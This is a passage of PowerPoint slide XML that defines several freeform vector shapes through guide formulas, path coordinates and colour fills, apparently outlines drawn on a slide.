                  <a:gd name="T17" fmla="*/ 0 h 1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
                  <a:gd name="T28" fmla="*/ 0 h 11"/>
                  <a:gd name="T29" fmla="*/ 6 w 6"/>
                  <a:gd name="T30" fmla="*/ 11 h 1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 h="11">
                    <a:moveTo>
                      <a:pt x="2" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="6" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="0"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36353" name="Freeform 85"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3169" y="3419"/>
                <a:ext cx="37" cy="37"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 12 w 37"/>
                  <a:gd name="T1" fmla="*/ 37 h 37"/>
                  <a:gd name="T2" fmla="*/ 15 w 37"/>
                  <a:gd name="T3" fmla="*/ 37 h 37"/>
                  <a:gd name="T4" fmla="*/ 16 w 37"/>
                  <a:gd name="T5" fmla="*/ 32 h 37"/>
                  <a:gd name="T6" fmla="*/ 21 w 37"/>
                  <a:gd name="T7" fmla="*/ 30 h 37"/>
                  <a:gd name="T8" fmla="*/ 28 w 37"/>
                  <a:gd name="T9" fmla="*/ 27 h 37"/>
                  <a:gd name="T10" fmla="*/ 30 w 37"/>
                  <a:gd name="T11" fmla="*/ 25 h 37"/>
                  <a:gd name="T12" fmla="*/ 34 w 37"/>
                  <a:gd name="T13" fmla="*/ 17 h 37"/>
                  <a:gd name="T14" fmla="*/ 36 w 37"/>
                  <a:gd name="T15" fmla="*/ 14 h 37"/>
                  <a:gd name="T16" fmla="*/ 37 w 37"/>
                  <a:gd name="T17" fmla="*/ 13 h 37"/>
                  <a:gd name="T18" fmla="*/ 36 w 37"/>
                  <a:gd name="T19" fmla="*/ 11 h 37"/>
                  <a:gd name="T20" fmla="*/ 29 w 37"/>
                  <a:gd name="T21" fmla="*/ 5 h 37"/>
                  <a:gd name="T22" fmla="*/ 27 w 37"/>
                  <a:gd name="T23" fmla="*/ 2 h 37"/>
                  <a:gd name="T24" fmla="*/ 24 w 37"/>
                  <a:gd name="T25" fmla="*/ 0 h 37"/>
                  <a:gd name="T26" fmla="*/ 22 w 37"/>
                  <a:gd name="T27" fmla="*/ 0 h 37"/>
                  <a:gd name="T28" fmla="*/ 15 w 37"/>
                  <a:gd name="T29" fmla="*/ 3 h 37"/>
                  <a:gd name="T30" fmla="*/ 10 w 37"/>
                  <a:gd name="T31" fmla="*/ 6 h 37"/>
                  <a:gd name="T32" fmla="*/ 6 w 37"/>
                  <a:gd name="T33" fmla="*/ 11 h 37"/>
                  <a:gd name="T34" fmla="*/ 4 w 37"/>
                  <a:gd name="T35" fmla="*/ 14 h 37"/>
                  <a:gd name="T36" fmla="*/ 0 w 37"/>
                  <a:gd name="T37" fmla="*/ 19 h 37"/>
                  <a:gd name="T38" fmla="*/ 0 w 37"/>
                  <a:gd name="T39" fmla="*/ 23 h 37"/>
                  <a:gd name="T40" fmla="*/ 5 w 37"/>
                  <a:gd name="T41" fmla="*/ 30 h 37"/>
                  <a:gd name="T42" fmla="*/ 7 w 37"/>
                  <a:gd name="T43" fmla="*/ 33 h 37"/>
                  <a:gd name="T44" fmla="*/ 12 w 37"/>
                  <a:gd name="T45" fmla="*/ 37 h 3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37"/>
                  <a:gd name="T70" fmla="*/ 0 h 37"/>
                  <a:gd name="T71" fmla="*/ 37 w 37"/>
                  <a:gd name="T72" fmla="*/ 37 h 37"/>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37" h="37">
                    <a:moveTo>
                      <a:pt x="12" y="37"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="15" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="37"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36354" name="Freeform 86"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3258" y="3097"/>
                <a:ext cx="50" cy="122"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 27 w 50"/>
                  <a:gd name="T1" fmla="*/ 40 h 122"/>
                  <a:gd name="T2" fmla="*/ 28 w 50"/>
                  <a:gd name="T3" fmla="*/ 50 h 122"/>
                  <a:gd name="T4" fmla="*/ 30 w 50"/>
                  <a:gd name="T5" fmla="*/ 61 h 122"/>
                  <a:gd name="T6" fmla="*/ 38 w 50"/>
                  <a:gd name="T7" fmla="*/ 67 h 122"/>
                  <a:gd name="T8" fmla="*/ 49 w 50"/>
                  <a:gd name="T9" fmla="*/ 81 h 122"/>
                  <a:gd name="T10" fmla="*/ 49 w 50"/>
                  <a:gd name="T11" fmla="*/ 101 h 122"/>
                  <a:gd name="T12" fmla="*/ 47 w 50"/>
                  <a:gd name="T13" fmla="*/ 106 h 122"/>
                  <a:gd name="T14" fmla="*/ 42 w 50"/>
                  <a:gd name="T15" fmla="*/ 107 h 122"/>
                  <a:gd name="T16" fmla="*/ 40 w 50"/>
                  <a:gd name="T17" fmla="*/ 113 h 122"/>
                  <a:gd name="T18" fmla="*/ 41 w 50"/>
                  <a:gd name="T19" fmla="*/ 120 h 122"/>
                  <a:gd name="T20" fmla="*/ 39 w 50"/>
                  <a:gd name="T21" fmla="*/ 122 h 122"/>
                  <a:gd name="T22" fmla="*/ 29 w 50"/>
                  <a:gd name="T23" fmla="*/ 110 h 122"/>
                  <a:gd name="T24" fmla="*/ 24 w 50"/>
                  <a:gd name="T25" fmla="*/ 103 h 122"/>
                  <a:gd name="T26" fmla="*/ 28 w 50"/>
                  <a:gd name="T27" fmla="*/ 97 h 122"/>
                  <a:gd name="T28" fmla="*/ 29 w 50"/>
                  <a:gd name="T29" fmla="*/ 90 h 122"/>
                  <a:gd name="T30" fmla="*/ 27 w 50"/>
                  <a:gd name="T31" fmla="*/ 79 h 122"/>
                  <a:gd name="T32" fmla="*/ 20 w 50"/>
                  <a:gd name="T33" fmla="*/ 79 h 122"/>
                  <a:gd name="T34" fmla="*/ 13 w 50"/>
                  <a:gd name="T35" fmla="*/ 79 h 122"/>
                  <a:gd name="T36" fmla="*/ 8 w 50"/>
                  <a:gd name="T37" fmla="*/ 72 h 122"/>
                  <a:gd name="T38" fmla="*/ 4 w 50"/>
                  <a:gd name="T39" fmla="*/ 70 h 122"/>
                  <a:gd name="T40" fmla="*/ 0 w 50"/>
                  <a:gd name="T41" fmla="*/ 64 h 122"/>
                  <a:gd name="T42" fmla="*/ 3 w 50"/>
                  <a:gd name="T43" fmla="*/ 52 h 122"/>
                  <a:gd name="T44" fmla="*/ 10 w 50"/>
                  <a:gd name="T45" fmla="*/ 48 h 122"/>
                  <a:gd name="T46" fmla="*/ 15 w 50"/>
                  <a:gd name="T47" fmla="*/ 44 h 122"/>
                  <a:gd name="T48" fmla="*/ 11 w 50"/>
                  <a:gd name="T49" fmla="*/ 41 h 122"/>
                  <a:gd name="T50" fmla="*/ 8 w 50"/>
                  <a:gd name="T51" fmla="*/ 37 h 122"/>
                  <a:gd name="T52" fmla="*/ 9 w 50"/>
                  <a:gd name="T53" fmla="*/ 21 h 122"/>
                  <a:gd name="T54" fmla="*/ 14 w 50"/>
                  <a:gd name="T55" fmla="*/ 17 h 122"/>
                  <a:gd name="T56" fmla="*/ 15 w 50"/>
                  <a:gd name="T57" fmla="*/ 13 h 122"/>
                  <a:gd name="T58" fmla="*/ 8 w 50"/>
                  <a:gd name="T59" fmla="*/ 0 h 122"/>
                  <a:gd name="T60" fmla="*/ 17 w 50"/>
                  <a:gd name="T61" fmla="*/ 1 h 122"/>
                  <a:gd name="T62" fmla="*/ 25 w 50"/>
                  <a:gd name="T63" fmla="*/ 11 h 122"/>
                  <a:gd name="T64" fmla="*/ 26 w 50"/>
                  <a:gd name="T65" fmla="*/ 22 h 122"/>
                  <a:gd name="T66" fmla="*/ 28 w 50"/>
                  <a:gd name="T67" fmla="*/ 32 h 122"/>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50"/>
                  <a:gd name="T103" fmla="*/ 0 h 122"/>
                  <a:gd name="T104" fmla="*/ 50 w 50"/>
                  <a:gd name="T105" fmla="*/ 122 h 122"/>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50" h="122">
                    <a:moveTo>
                      <a:pt x="28" y="32"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="27" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="32"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36355" name="Freeform 87"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3258" y="3097"/>
                <a:ext cx="50" cy="122"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 27 w 50"/>
                  <a:gd name="T1" fmla="*/ 40 h 122"/>
                  <a:gd name="T2" fmla="*/ 28 w 50"/>
                  <a:gd name="T3" fmla="*/ 50 h 122"/>
                  <a:gd name="T4" fmla="*/ 30 w 50"/>
                  <a:gd name="T5" fmla="*/ 61 h 122"/>
                  <a:gd name="T6" fmla="*/ 38 w 50"/>
                  <a:gd name="T7" fmla="*/ 67 h 122"/>
                  <a:gd name="T8" fmla="*/ 49 w 50"/>
                  <a:gd name="T9" fmla="*/ 81 h 122"/>
                  <a:gd name="T10" fmla="*/ 49 w 50"/>
                  <a:gd name="T11" fmla="*/ 101 h 122"/>
                  <a:gd name="T12" fmla="*/ 47 w 50"/>
                  <a:gd name="T13" fmla="*/ 106 h 122"/>
                  <a:gd name="T14" fmla="*/ 42 w 50"/>
                  <a:gd name="T15" fmla="*/ 107 h 122"/>
                  <a:gd name="T16" fmla="*/ 40 w 50"/>
                  <a:gd name="T17" fmla="*/ 113 h 122"/>
                  <a:gd name="T18" fmla="*/ 41 w 50"/>
                  <a:gd name="T19" fmla="*/ 120 h 122"/>
                  <a:gd name="T20" fmla="*/ 39 w 50"/>
                  <a:gd name="T21" fmla="*/ 122 h 122"/>
                  <a:gd name="T22" fmla="*/ 29 w 50"/>
                  <a:gd name="T23" fmla="*/ 110 h 122"/>
                  <a:gd name="T24" fmla="*/ 24 w 50"/>
                  <a:gd name="T25" fmla="*/ 103 h 122"/>
                  <a:gd name="T26" fmla="*/ 28 w 50"/>
                  <a:gd name="T27" fmla="*/ 97 h 122"/>
                  <a:gd name="T28" fmla="*/ 29 w 50"/>
                  <a:gd name="T29" fmla="*/ 90 h 122"/>
                  <a:gd name="T30" fmla="*/ 27 w 50"/>
                  <a:gd name="T31" fmla="*/ 79 h 122"/>
                  <a:gd name="T32" fmla="*/ 20 w 50"/>
                  <a:gd name="T33" fmla="*/ 79 h 122"/>
                  <a:gd name="T34" fmla="*/ 13 w 50"/>
                  <a:gd name="T35" fmla="*/ 79 h 122"/>
                  <a:gd name="T36" fmla="*/ 8 w 50"/>
                  <a:gd name="T37" fmla="*/ 72 h 122"/>
                  <a:gd name="T38" fmla="*/ 4 w 50"/>
                  <a:gd name="T39" fmla="*/ 70 h 122"/>
                  <a:gd name="T40" fmla="*/ 0 w 50"/>
                  <a:gd name="T41" fmla="*/ 64 h 122"/>
                  <a:gd name="T42" fmla="*/ 3 w 50"/>
                  <a:gd name="T43" fmla="*/ 52 h 122"/>
                  <a:gd name="T44" fmla="*/ 10 w 50"/>
                  <a:gd name="T45" fmla="*/ 48 h 122"/>
                  <a:gd name="T46" fmla="*/ 15 w 50"/>
                  <a:gd name="T47" fmla="*/ 44 h 122"/>
                  <a:gd name="T48" fmla="*/ 11 w 50"/>
                  <a:gd name="T49" fmla="*/ 41 h 122"/>
                  <a:gd name="T50" fmla="*/ 8 w 50"/>
                  <a:gd name="T51" fmla="*/ 37 h 122"/>
                  <a:gd name="T52" fmla="*/ 9 w 50"/>
                  <a:gd name="T53" fmla="*/ 21 h 122"/>
                  <a:gd name="T54" fmla="*/ 14 w 50"/>
                  <a:gd name="T55" fmla="*/ 17 h 122"/>
                  <a:gd name="T56" fmla="*/ 15 w 50"/>
                  <a:gd name="T57" fmla="*/ 13 h 122"/>
                  <a:gd name="T58" fmla="*/ 8 w 50"/>
                  <a:gd name="T59" fmla="*/ 0 h 122"/>
                  <a:gd name="T60" fmla="*/ 17 w 50"/>
                  <a:gd name="T61" fmla="*/ 1 h 122"/>
                  <a:gd name="T62" fmla="*/ 25 w 50"/>
                  <a:gd name="T63" fmla="*/ 11 h 122"/>
                  <a:gd name="T64" fmla="*/ 26 w 50"/>
                  <a:gd name="T65" fmla="*/ 22 h 122"/>
                  <a:gd name="T66" fmla="*/ 28 w 50"/>
                  <a:gd name="T67" fmla="*/ 32 h 122"/>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50"/>
                  <a:gd name="T103" fmla="*/ 0 h 122"/>
                  <a:gd name="T104" fmla="*/ 50 w 50"/>
                  <a:gd name="T105" fmla="*/ 122 h 122"/>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50" h="122">
                    <a:moveTo>
                      <a:pt x="28" y="32"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="27" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="32"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36356" name="Freeform 88"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3704" y="2312"/>
                <a:ext cx="267" cy="244"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 103 w 267"/>
                  <a:gd name="T1" fmla="*/ 238 h 244"/>
                  <a:gd name="T2" fmla="*/ 93 w 267"/>
                  <a:gd name="T3" fmla="*/ 227 h 244"/>
                  <a:gd name="T4" fmla="*/ 92 w 267"/>
                  <a:gd name="T5" fmla="*/ 217 h 244"/>
                  <a:gd name="T6" fmla="*/ 70 w 267"/>
                  <a:gd name="T7" fmla="*/ 218 h 244"/>
                  <a:gd name="T8" fmla="*/ 53 w 267"/>
                  <a:gd name="T9" fmla="*/ 217 h 244"/>
                  <a:gd name="T10" fmla="*/ 35 w 267"/>
                  <a:gd name="T11" fmla="*/ 220 h 244"/>
                  <a:gd name="T12" fmla="*/ 12 w 267"/>
                  <a:gd name="T13" fmla="*/ 222 h 244"/>
                  <a:gd name="T14" fmla="*/ 18 w 267"/>
                  <a:gd name="T15" fmla="*/ 202 h 244"/>
                  <a:gd name="T16" fmla="*/ 37 w 267"/>
                  <a:gd name="T17" fmla="*/ 195 h 244"/>
                  <a:gd name="T18" fmla="*/ 33 w 267"/>
                  <a:gd name="T19" fmla="*/ 183 h 244"/>
                  <a:gd name="T20" fmla="*/ 26 w 267"/>
                  <a:gd name="T21" fmla="*/ 164 h 244"/>
                  <a:gd name="T22" fmla="*/ 6 w 267"/>
                  <a:gd name="T23" fmla="*/ 145 h 244"/>
                  <a:gd name="T24" fmla="*/ 18 w 267"/>
                  <a:gd name="T25" fmla="*/ 142 h 244"/>
                  <a:gd name="T26" fmla="*/ 42 w 267"/>
                  <a:gd name="T27" fmla="*/ 143 h 244"/>
